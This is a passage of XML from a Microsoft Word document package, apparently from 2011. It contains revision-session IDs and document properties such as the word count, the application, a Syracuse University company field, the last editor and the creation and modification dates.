    <w:rsid w:val="00F82942"/>
    <w:rsid w:val="00F841F6"/>
    <w:rsid w:val="00F907BD"/>
    <w:rsid w:val="00F92C08"/>
    <w:rsid w:val="00F9476B"/>
    <w:rsid w:val="00F97CD0"/>
    <w:rsid w:val="00FA6B36"/>
    <w:rsid w:val="00FB2BC7"/>
    <w:rsid w:val="00FB52CB"/>
    <w:rsid w:val="00FC42B1"/>
    <w:rsid w:val="00FC45D0"/>
    <w:rsid w:val="00FC799E"/>
    <w:rsid w:val="00FC7C87"/>
    <w:rsid w:val="00FD024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348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AE"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AE"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CE149-DB7A-594D-9099-E6D3CC0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875</Words>
  <Characters>4992</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>41</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Syracuse University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eng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jian Zheng</cp:lastModifiedBy>
  <cp:revision>399</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-19T15:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-17T02:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>